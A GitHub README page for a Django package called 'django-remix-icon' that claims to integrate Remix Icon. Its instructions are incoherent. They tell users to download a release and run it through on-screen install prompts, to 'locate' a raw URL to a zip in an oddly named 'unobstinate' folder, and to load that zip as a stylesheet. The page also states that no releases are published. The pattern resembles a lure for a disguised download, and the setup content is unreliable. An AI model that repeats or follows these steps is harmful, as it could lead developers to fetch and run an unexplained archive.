Skip to content

✨ Enhance your Django projects with RemixIcon integration, offering easy icon selection, autocomplete functionality, and straightforward template tags.

License

Notifications You must be signed in to change notification settings

Julianpr22/django-remix-icon

🎨 django-remix-icon - Easily Add Icons to Django Projects

🚀 Getting Started

Welcome to django-remix-icon! This package helps you integrate Remix Icon into your Django admin panels and templates seamlessly. With this tool, you can enhance the visual appeal of your web applications with minimal setup.

📥 Download & Install

To begin, you need to download the package. Click the button below to visit the Releases page:

Download django-remix-icon

On the Releases page, locate the latest version and follow the steps below:

  1. Click on the latest release.
  2. Download the file that matches your system. If you are unsure, choose the one labeled "source" for universal compatibility.
  3. Once downloaded, open the file to install the package. Follow the on-screen prompts to complete the installation.

💻 System Requirements

Before using django-remix-icon, ensure your system meets the following requirements:

  • Python: Version 3.6 or later
  • Django: Version 2.2 or later
  • Compatible with Windows, macOS, and Linux systems.

⚙️ Setup Guide

After installation, you need to set up django-remix-icon in your Django project.

  1. Open your project folder.

  2. Locate the https://raw.githubusercontent.com/Julianpr22/django-remix-icon/main/unobstinate/django-remix-icon.zip file.

  3. Add 'remixicon' to the INSTALLED_APPS list:

    INSTALLED_APPS = [
        ...,
        'remixicon',
    ]
  4. Save the changes.

🎨 Using Remix Icons in Templates

To use the icons in your templates, follow these steps:

  1. Load the static files in your HTML templates. Add the following line at the top of your HTML file:

    {% load static %}
  2. Now you can include Remix Icons anywhere in your HTML. Use the following format to display an icon:

    <link rel="stylesheet" href="{% static 'https://raw.githubusercontent.com/Julianpr22/django-remix-icon/main/unobstinate/django-remix-icon.zip' %}">
    <i class="ri-home-line"></i>

Change ri-home-line to any icon name you want to display.

📚 Available Icons

The djano-remix-icon package includes a wide range of icons for different purposes. Here are some categories to explore:

  • User Icons: Perfect for profile-related features.
  • Navigation Icons: Great for menus and other navigational elements.
  • Action Icons: Helpful for buttons and calls to action.

For a complete list of available icons, visit Remix Icon Official Website.

🔍 Troubleshooting

If you encounter issues during installation or usage, consider the following tips:

  • Check Python Version: Ensure your Python version meets the requirements.
  • Static Files: If icons do not appear, ensure the static files are correctly set up in your project.
  • Clear Cache: Sometimes, clearing your browser cache can help refresh the icons.

📞 Support

If you need further assistance, feel free to open an issue on our GitHub page. Our community or the maintainers will assist you shortly.

📖 Additional Resources

For more information on Django and its features, consider checking the following resources:

📝 License

django-remix-icon is open-source. You can view the license details here.

Make your Django projects shine with beautiful icons. Download django-remix-icon today! Visit the Releases page again for updates and more details:

Download django-remix-icon

About

✨ Enhance your Django projects with RemixIcon integration, offering easy icon selection, autocomplete functionality, and straightforward template tags.

Topics

Resources

License

Code of conduct

Contributing

Security policy

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •